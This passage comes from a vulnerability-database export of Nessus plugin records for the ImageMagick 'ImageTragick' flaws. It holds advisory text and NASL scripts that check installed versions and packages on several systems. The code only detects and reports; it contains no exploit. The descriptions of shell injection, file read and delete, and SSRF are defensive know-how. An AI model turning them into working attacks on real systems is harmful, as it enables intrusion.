(CVE-2016-3715)\n\n - An unspecified flaw exists in the 'msl' pseudo protocol\n that allows an attacker to move arbitrary files to\n arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo\n protocol that allows an attacker, via a specially\n crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)", "edition": 29, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-04T00:00:00", "title": "ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:imagemagick:imagemagick"], "id": "IMAGEMAGICK_7_0_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/90892", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90892);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n script_bugtraq_id(\n 89848,\n 89849,\n 89852,\n 89861,\n 89866\n );\n script_xref(name:\"CERT\", value:\"250519\");\n script_xref(name:\"EDB-ID\", value:\"39767\");\n script_xref(name:\"EDB-ID\", value:\"39791\");\n\n script_name(english:\"ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)\");\n script_summary(english:\"Checks the version of ImageMagick.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has 
an application installed that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of ImageMagick installed that is\nprior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected\nby the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists due to a failure to properly filter\n shell characters in filenames passed to delegate\n commands. A remote attacker can exploit this, via\n specially crafted images, to inject shell commands and\n execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo\n protocol that allows an attacker to delete arbitrary\n files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'ms' pseudo protocol\n that allows an attacker to move arbitrary files to\n arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo\n protocol that allows an attacker, via a specially\n crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. 
A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.imagemagick.org/script/changelog.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://imagetragick.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ImageMagick version 7.0.1-1 / 6.9.3-10 or later.\n\nNote that you may need to manually uninstall the vulnerable version\nfrom the system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:imagemagick:imagemagick\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"imagemagick_installed.nasl\");\n script_require_keys(\"installed_sw/ImageMagick\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ImageMagick\";\n\n# Get installs\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\ndisplay_version = install['display_version'];\nversion = install['version'];\nbuild = install['build'];\npath = install['path'];\n\nvuln = FALSE;\n\nif (version =~ \"^6\\.\")\n{\n fix = \"6.9.3\";\n fix_build = 10;\n}\nelse if (version =~ \"^7\\.\")\n{\n fix = \"7.0.1\";\n fix_build = 1;\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n\ndisplay_fix = fix + \"-\" + fix_build;\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;\n\nif ((ver_compare(ver:version, fix:fix, strict:FALSE) == 0) &&\n build < fix_build\n )\n vuln = TRUE;\n\nif (vuln)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n items = make_array(\"Installed version\", display_version,\n \"Fixed version\", display_fix,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:30:25", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - 
CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 21, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ImageMagick", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3", 
"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libMagick++-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:libMagick++-devel"], "id": "OPENSUSE-2016-574.NASL", "href": "https://www.tenable.com/plugins/nessus/90986", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-574.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90986);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-574 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any 
extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debugsource-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-devel-6.8.8.1-9.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-01-17T09:10:53", "description": "New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.", "edition": 24, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "title": "Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-12T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:imagemagick", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird"], "id": "SLACKWARE_SSA_2016-132-01.NASL", "href": "https://www.tenable.com/plugins/nessus/91046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-132-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91046);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"SSA\", value:\"2016-132-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.359500\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a01f0c3\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27bd7c00\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick and / or mozilla-thunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", 
pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:49:37", "description": "Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. 
An attacker with control over the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or\ndelete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717)\nlocal files.\n\nThese vulnerabilities are particularly critical if ImageMagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via the /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full removal of the\nPLT/Gnuplot decoder, and the need for an explicit reference in the\nfilename for the insecure coders.", "edition": 25, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "title": "Debian DSA-3580-1 : imagemagick - security update (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-17T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:imagemagick"], "id": "DEBIAN_DSA-3580.NASL", "href": "https://www.tenable.com/plugins/nessus/91175", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3580. 
